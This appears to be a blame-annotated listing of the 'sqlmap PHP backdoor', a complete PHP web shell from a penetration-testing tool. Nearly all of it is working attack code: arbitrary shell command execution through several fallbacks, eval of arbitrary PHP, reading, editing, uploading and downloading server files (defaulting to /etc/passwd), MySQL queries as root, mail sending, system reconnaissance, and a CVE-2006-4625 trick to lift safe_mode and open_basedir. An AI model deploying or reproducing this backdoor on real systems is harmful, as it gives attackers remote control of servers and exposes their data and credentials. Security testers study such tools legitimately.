2008-10-15 19:38:22 +04:00
|
|
|
<?php
|
|
|
|
@set_time_limit();
|
|
|
|
@error_reporting(0);
|
|
|
|
@ob_implicit_flush();
|
|
|
|
$phpself=$_SERVER["PHP_SELF"];
|
|
|
|
$css="body { background: #FFCC66; font-family: sans-serif; margin: auto; margin-bottom: 1em; margin-top: 1em; width: 95%; } a { color: #663300; text-decoration: none; } input, textarea { border: 1px solid gray; } pre { border: 1px dashed #663300; padding: 5px; background: #fffff0; } table { border-collapse: collapse; border: 1px solid #663300; background: #fffff0; width: 100%; } td, th { border: 1px solid #663300; padding: .3em; } thead th, tfoot th { border: 1px solid #663300; text-align: center; font-size: 1em; font-weight: bold; color: #663300; background: #FFCC66; } #maintitle { background: #FFFFFF; border: 1px solid; border-color: #663300; padding: .3em; text-align: center; } #leftbody { background: #FFFFFF; border: 1px solid; border-color: #663300; padding: .5em; width: 22%; float: left; position: relative; } #rightbody { background: #FFFFFF; border: 1px solid; border-color: #663300; padding: 15px; width: 73%; float: right; position: relative; display:inline; }";
|
|
|
|
$cssEncoded=@urlencode($css);
|
|
|
|
|
|
|
|
function error($message) {
|
|
|
|
$completeMessage="<b>Error</b>: " . $message . ".";
|
|
|
|
die($completeMessage);
|
|
|
|
}
|
|
|
|
|
|
|
|
function getSymbolByQuantity($bytes) {
|
|
|
|
$symbols=array('B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB');
|
|
|
|
$exp=@floor(log($bytes)/log(1024));
|
|
|
|
|
|
|
|
return @sprintf('%.2f ' . $symbols[$exp], ($bytes/pow(1024, @floor($exp))));
|
|
|
|
}
|
|
|
|
|
|
|
|
function ex($command) {
|
|
|
|
$res='';
|
|
|
|
if (@function_exists('exec')) {
|
|
|
|
@exec($command, $res);
|
|
|
|
$res=@join("\n", $res);
|
|
|
|
}
|
|
|
|
elseif (@function_exists('shell_exec')) {
|
|
|
|
$res=@shell_exec($command);
|
|
|
|
}
|
|
|
|
elseif(@function_exists('system')) {
|
|
|
|
@ob_start();
|
|
|
|
@system($command);
|
|
|
|
$res=@ob_get_contents();
|
|
|
|
@ob_end_clean();
|
|
|
|
}
|
|
|
|
elseif (@function_exists('passthru')) {
|
|
|
|
@ob_start();
|
|
|
|
@passthru($command);
|
|
|
|
$res=@ob_get_contents();
|
|
|
|
@ob_end_clean();
|
|
|
|
}
|
|
|
|
elseif (@is_resource($f=@popen($command, "r"))) {
|
|
|
|
$res="";
|
|
|
|
while(!@feof($f)) {
|
|
|
|
$res .= @fread($f, 1024);
|
|
|
|
}
|
|
|
|
@pclose($f);
|
|
|
|
}
|
|
|
|
$res=@htmlspecialchars($res);
|
|
|
|
return $res;
|
|
|
|
}
|
|
|
|
|
|
|
|
if (!isset($_REQUEST["download"]) and !isset($_REQUEST["phpinfo"])) {
|
|
|
|
echo "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">";
|
|
|
|
echo "<html><head>";
|
|
|
|
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">";
|
|
|
|
echo "<meta name=\"author\" content=\"Bernardo Damele A. G.\">";
|
|
|
|
echo "<meta name=\"robots\" content=\"noindex,nofollow,noarchive\">";
|
|
|
|
echo "<style type=\"text/css\">" . $css . "</style><title>sqlmap PHP backdoor</title></head>";
|
|
|
|
echo "<body><div id=\"wrapper\" class=\"clearfix\"><div id=\"maintitle\"><h1>sqlmap PHP backdoor</h1></div><br><div id=\"leftbody\">";
|
|
|
|
echo "<p><b>System information</b>: <a href=\"" . $phpself . "?sysinfo\">here</a><br>";
|
|
|
|
echo "<b>PHP info</b>: <a href=\"" . $phpself . "?phpinfo\" target=\"_blank\">here</a><br>";
|
|
|
|
echo "<b>Send an email</b>: <a href=\"" . $phpself . "?mailForm\">here</a></p>";
|
|
|
|
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Read a file</b><br><input type=\"text\" name=\"readFile\" value=\"/etc/passwd\"><input type=\"submit\" value=\"go\"></form><br>";
|
|
|
|
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Edit a file</b><br><input type=\"text\" name=\"editFile\"><input type=\"submit\" value=\"go\"></form><br>";
|
|
|
|
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Download a file</b><br>Directory: <input type=\"text\" name=\"dir\" value=\"/etc\"><br>File: <input type=\"text\" name=\"download\" value=\"passwd\"><input type=\"submit\" value=\"go\"></form><br>";
|
|
|
|
echo "<form action=\"" . $phpself . "\" method=\"POST\" enctype=\"multipart/form-data\"><input type=hidden name=\"MAX_FILE_SIZE\" value=\"1000000000\"><b>Upload a file</b><br><input name=\"file\" type=\"file\"><br>to directory: <input type=\"text\" name=\"uploadDir\" value=\"/tmp\"><input type=\"submit\" name=\"upload\" value=\"upload\"></form><br>";
|
|
|
|
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Browse a directory</b><br><input type=\"text\" name=\"listDir\" value=\"/etc\"><input type=\"submit\" value=\"go\"></form><br>";
|
|
|
|
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Execute a shell command</b><br><input type=\"text\" name=\"cmd\" value=\"ps auxfww\"><input type=\"submit\" value=\"go\"></form><br>";
|
|
|
|
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Execute a PHP command</b><br><input type=\"text\" name=\"phpcode\" value=\"ini_get_all()\"><input type=\"submit\" value=\"go\"></form><br>";
|
|
|
|
echo "<form action=\"" . $phpself . "\" method=\"GET\"><b>Execute a MySQL query</b><br>host: <input type=\"text\" name=\"host\" value=\"localhost\"><br>user: <input type=\"text\" name=\"user\" value=\"root\"><br>password: <input type=\"password\" name=\"password\"><br>query: <input type=\"text\" name=\"query\"><br><input type=\"submit\" value=\"execute\"></form><br>";
|
2008-11-09 22:00:54 +03:00
|
|
|
echo "</div><div id=\"rightbody\">";
|
2008-10-15 19:38:22 +04:00
|
|
|
}
|
|
|
|
|
|
|
|
if (isset($_REQUEST["sysinfo"])) {
|
|
|
|
if (@strtolower(@substr(@PHP_OS, 0, 3)) == "win") {
|
|
|
|
$win=1;
|
|
|
|
}
|
|
|
|
else {
|
|
|
|
$win=0;
|
|
|
|
}
|
|
|
|
$safeMode=@ini_get("safe_mode");
|
|
|
|
$openBaseDir=@ini_get("open_basedir");
|
|
|
|
if ($safeMode || $openBaseDir) {
|
|
|
|
/**
|
|
|
|
* Exploit CVE: CVE-2006-4625
|
|
|
|
* Affected Software: PHP 5.1.6 / 4.4.4 < = x
|
|
|
|
* Advisory URL: http://securityreason.com/achievement_securityalert/42
|
|
|
|
* Try to restore to default value
|
|
|
|
*/
|
|
|
|
ini_restore("safe_mode");
|
|
|
|
ini_restore("open_basedir");
|
|
|
|
}
|
|
|
|
$magicQuotesGpc=@ini_get("magic_quotes_gpc");
|
|
|
|
$dir=@getcwd();
|
|
|
|
$total=@disk_total_space($dir);
|
|
|
|
$free=@disk_free_space($dir);
|
|
|
|
echo "<b>Operating system</b><br><pre>" . @PHP_OS;
|
|
|
|
echo "</pre><b>Server uname</b><br><pre>" . php_uname();
|
|
|
|
echo "</pre><b>Server uptime</b><br><pre>";
|
2009-10-22 20:25:19 +04:00
|
|
|
echo (!$win) ? ex("uptime") : ex("net statistics server");
|
2008-10-15 19:38:22 +04:00
|
|
|
echo "</pre><b>Server time</b><br><pre>";
|
|
|
|
echo date("D, M d, h:iA");
|
|
|
|
echo "</pre><b>Disk space</b><br><pre>";
|
|
|
|
echo "Total space: " . getSymbolByQuantity($total) . "<br>";
|
|
|
|
echo "Free space: " . getSymbolByQuantity($free);
|
|
|
|
echo "</pre><b>Web server username</b><br><pre>";
|
|
|
|
echo (!$win) ? `id` . "<br>" : @get_current_user();
|
|
|
|
echo "</pre><b>PHP version</b><br><pre>" . @phpversion();
|
|
|
|
echo "</pre><b>PHP safe_mode</b><br><pre>";
|
|
|
|
echo ($safeMode) ? "ON<br>" : "OFF<br>";
|
|
|
|
echo "</pre><b>PHP open_basedir</b><br><pre>";
|
|
|
|
echo ($openBaseDir) ? "ON<br>" : "OFF<br>";
|
|
|
|
echo "</pre><b>PHP magic_quotes_gpc</b><br><pre>";
|
|
|
|
echo ($magicQuotesGpc) ? "ON<br>" : "OFF<br>";
|
|
|
|
echo "</pre><b>CPU information</b><br><pre>";
|
|
|
|
echo ex("cat /proc/cpuinfo");
|
|
|
|
echo "</pre><b>Memory information</b><br><pre>";
|
|
|
|
echo ex("cat /proc/meminfo");
|
|
|
|
echo "</pre><b>Open ports and active connections</b><br><pre>";
|
2009-10-22 20:25:19 +04:00
|
|
|
echo (!$win) ? ex("netstat -nat") : ex("netstat -ano");
|
|
|
|
echo "</pre><b>Network devices</b><br><pre>";
|
|
|
|
echo (!$win) ? ex("/sbin/ifconfig -a") : ex("ipconfig /all");
|
2008-10-15 19:38:22 +04:00
|
|
|
echo "</pre><b>Processes</b><br><pre>";
|
2009-10-22 20:25:19 +04:00
|
|
|
echo (!$win) ? ex("ps auxfww") : ex("tasklist");
|
2008-10-15 19:38:22 +04:00
|
|
|
echo "</pre>";
|
2009-10-22 20:25:19 +04:00
|
|
|
echo ($win) ? "<b>Network use</b><br><pre>".ex("net use")."</pre><b>Network share</b><br><pre>".ex("net share")."</pre><b>Network user</b><br><pre>".ex("net user")."</pre>" : "";
|
2008-10-15 19:38:22 +04:00
|
|
|
}
|
|
|
|
|
|
|
|
else if(isset($_REQUEST["phpinfo"])) {
|
|
|
|
echo @phpinfo();
|
|
|
|
}
|
|
|
|
|
|
|
|
else if (isset($_REQUEST["readFile"])) {
|
|
|
|
$file=$_REQUEST["readFile"];
|
|
|
|
$fileHandler=@fopen($file, "rb") or error("Unable to read file <code>" . $file . "</code>");
|
|
|
|
$fileContent=@file_get_contents($file);
|
|
|
|
echo "<p>File: <code>" . $file . "</code><p>";
|
|
|
|
echo "<pre>" . @htmlspecialchars($fileContent) . "</pre>";
|
|
|
|
}
|
|
|
|
|
|
|
|
else if(isset($_REQUEST["editFile"])) {
|
|
|
|
$file=$_REQUEST["editFile"];
|
|
|
|
if (!$file) {
|
|
|
|
error("Specify the file to edit");
|
|
|
|
}
|
|
|
|
$fileHandler=@fopen($file, "rb") or error("Unable to read file <code>" . $file . "</code>");
|
|
|
|
$fileContent=@file_get_contents($file);
|
|
|
|
echo "<form action=$phpself method=POST>";
|
|
|
|
echo "File: <input type=text name=saveFile value=" . $file . " readonly=readonly><br><br>";
|
|
|
|
echo "<textarea name=contentFile cols=80 rows=40>";
|
|
|
|
echo $fileContent;
|
|
|
|
echo "</textarea><br><input type=submit value=Save>";
|
|
|
|
}
|
|
|
|
|
|
|
|
else if (isset($_REQUEST["saveFile"])) {
|
|
|
|
$file=$_REQUEST["saveFile"];
|
|
|
|
$newContent=$_REQUEST["contentFile"];
|
|
|
|
if (@is_writable($file)) {
|
|
|
|
$fileHandler=@fopen($file, "w+") or error("Unable to read file <code>" . $file . "</code>");
|
|
|
|
@fwrite($fileHandler, $newContent) or error("Unable to write on file <code>" . $file . "</code>");
|
|
|
|
echo "File <code>" . $file . "</code> successfully written";
|
|
|
|
@fclose($fileHandler);
|
|
|
|
}
|
|
|
|
else {
|
|
|
|
error("File <code>" . $file . "</code> is not writable");
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
else if (isset($_REQUEST["download"])) {
|
|
|
|
ob_clean();
|
|
|
|
$dir=$_REQUEST["dir"];
|
|
|
|
$file=$_REQUEST["download"];
|
|
|
|
$filename=$dir. "/" . $file;
|
|
|
|
$fileHandler=@fopen($filename, "rb") or error("Unable to read file <code>" . $file . "</code>");
|
|
|
|
$fileContent=@file_get_contents($filename);
|
|
|
|
header("Content-type: application/octet-stream");
|
|
|
|
header("Content-length: " . strlen($fileContent));
|
|
|
|
header("Content-disposition: attachment; filename=" . $file . ";");
|
|
|
|
echo $fileContent;
|
|
|
|
exit;
|
|
|
|
}
|
|
|
|
|
|
|
|
else if (isset($_REQUEST["upload"])) {
|
|
|
|
if (!isset($_REQUEST["uploadDir"])) {
|
|
|
|
error("Specify directory name (ig: /tmp)");
|
|
|
|
}
|
|
|
|
$dir=$_REQUEST["uploadDir"];
|
|
|
|
$file=$HTTP_POST_FILES["file"]["name"];
|
|
|
|
@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or error("File upload error");
|
|
|
|
@chmod($dir . "/" . $file, 0755) or error("Unable to set file permission on <code>" . $file . "</code>");
|
|
|
|
echo "<p>File <code>" . $file . "</code> successfully uploaded to <code>" . $dir . "</code></p>";
|
|
|
|
}
|
|
|
|
|
|
|
|
else if (isset($_REQUEST["listDir"])) {
|
|
|
|
$dirToOpen=$_REQUEST["listDir"];
|
|
|
|
$dirHandler=@opendir($dirToOpen) or error("Unable to open directory");
|
|
|
|
echo "<p>Directory: <code>" . $dirToOpen . "</code></p>";
|
|
|
|
echo "<table border=1><tr><thead><th>Name</th><th>Permission</th><th>Owner/Group</th><th>Size</th><th>Read</th><th>Write</th><th>Download</th></thead></tr>";
|
|
|
|
$list=array();
|
|
|
|
while ($o=@readdir($dirHandler)) {
|
|
|
|
$list[]=$o;
|
|
|
|
}
|
|
|
|
@closedir($dirHandler);
|
|
|
|
@sort($list);
|
|
|
|
foreach ($list as $file) {
|
|
|
|
if ($file == ".") {
|
|
|
|
continue;
|
|
|
|
}
|
|
|
|
$linkToFile=$dirToOpen . "/" . $file;
|
|
|
|
$isdir=@is_dir($linkToFile);
|
|
|
|
$islink=@is_link($linkToFile);
|
|
|
|
$isfile=@is_file($linkToFile);
|
|
|
|
echo "<tr><tbody>";
|
|
|
|
if ($isdir) {
|
|
|
|
echo "<td><a href=$phpself?listDir=$linkToFile>";
|
|
|
|
}
|
|
|
|
else if ($isfile) {
|
|
|
|
echo "<td><a href=$phpself?readFile=$linkToFile>";
|
|
|
|
}
|
|
|
|
else {
|
|
|
|
echo "<td>$linkToFile";
|
|
|
|
}
|
|
|
|
echo "$linkToFile</a></td>";
|
|
|
|
echo "<td>" . @substr(@sprintf("%o", @fileperms($linkToFile)), -4) . "</td>";
|
|
|
|
$owner=@posix_getpwuid(@fileowner($linkToFile));
|
|
|
|
$group=@posix_getgrgid(@filegroup($linkToFile));
|
|
|
|
echo "<td>" . $owner["name"] . "/" . $group["name"] . "</td>";
|
|
|
|
if ($isdir) {
|
|
|
|
echo "<td>DIR</td>";
|
|
|
|
}
|
|
|
|
else if ($islink) {
|
|
|
|
echo "<td>LINK</td>";
|
|
|
|
}
|
|
|
|
else if ($isfile) {
|
|
|
|
echo "<td>" . @sprintf("%u", @filesize($linkToFile)) . " bytes</td>";
|
|
|
|
}
|
|
|
|
else {
|
|
|
|
echo "<td>Unknown</td>";
|
|
|
|
}
|
|
|
|
echo (@is_readable($linkToFile) && $isfile) ? "<td><a href=$phpself?readFile=$linkToFile>Read</a></td>" : "<td>-</td>";
|
|
|
|
echo (@is_writable($linkToFile) && $isfile) ? "<td><a href=$phpself?editFile=$linkToFile>Write</a></td>" : "<td>-</td>";
|
|
|
|
echo (@is_readable($linkToFile) && $isfile) ? "<td><a href=$phpself?dir=$dirToOpen&download=$file>Download</a></td>" : "<td>-</td>";
|
|
|
|
echo "</tr>";
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
else if (isset($_REQUEST["mailForm"])) {
|
|
|
|
echo "<form action=" . $phpself . " method=POST>";
|
|
|
|
echo "<input name=mail type=hidden><input type=hidden name=mail>";
|
|
|
|
echo "To: <input name=to type=text value=\"foo@bar.tld\"><br><br>";
|
|
|
|
echo "Subject: <input name=subject type=text value=\"" . $_SERVER["HTTP_HOST"] . ": sqlmap PHP backdoor\"/><br><br>";
|
|
|
|
echo "Body:<br><textarea cols=80 rows=40 name=msg></textarea><br>";
|
|
|
|
echo "<input type=submit value=Send>";
|
|
|
|
}
|
|
|
|
|
|
|
|
else if (isset($_REQUEST["mail"])) {
|
|
|
|
$status=@mail($_REQUEST["to"], $_REQUEST["subject"], $_REQUEST["msg"]);
|
|
|
|
echo $status ? "Mail sent" : "Failed to send mail";
|
|
|
|
@exit;
|
|
|
|
}
|
|
|
|
|
|
|
|
else if (isset($_REQUEST["cmd"])) {
|
|
|
|
$cmd=$_REQUEST["cmd"];
|
|
|
|
echo "<p>Shell command: <code>" . $cmd . "</code></p>";
|
|
|
|
echo "<pre>" . ex($cmd) . "</pre>";
|
|
|
|
}
|
|
|
|
|
|
|
|
else if(isset($_REQUEST["phpcode"])) {
|
|
|
|
$code=$_REQUEST["phpcode"];
|
|
|
|
echo "<p>PHP command: <code>" . $code . "</code></p>";
|
|
|
|
echo "<pre>";
|
|
|
|
echo @eval("print_r($code);");
|
|
|
|
echo "</pre>";
|
|
|
|
}
|
|
|
|
|
|
|
|
else if (isset($_REQUEST["query"])) {
|
|
|
|
$host=$_REQUEST["host"];
|
|
|
|
$user=$_REQUEST["user"];
|
|
|
|
$password=$_REQUEST["password"];
|
|
|
|
$query=$_REQUEST["query"];
|
|
|
|
$link=@mysql_connect("$host", "$user", "$password");
|
|
|
|
if (!$link) {
|
|
|
|
error(@mysql_error());
|
|
|
|
}
|
|
|
|
$result=@mysql_query($query);
|
|
|
|
if (!$result) {
|
|
|
|
error(@mysql_error());
|
|
|
|
}
|
|
|
|
echo "<p>MySQL query: <code>" . $query . "</code></p>";
|
|
|
|
echo "<pre>";
|
|
|
|
while ($row=@mysql_fetch_array($result, MYSQL_ASSOC)) {
|
|
|
|
@print_r($row);
|
|
|
|
}
|
|
|
|
echo "</pre>";
|
|
|
|
@mysql_free_result($result);
|
|
|
|
}
|
|
|
|
|
|
|
|
if (!isset($_REQUEST["download"]) and !isset($_REQUEST["phpinfo"])) {
|
|
|
|
echo "</div></div></body></html>";
|
|
|
|
}
|
|
|
|
?>
|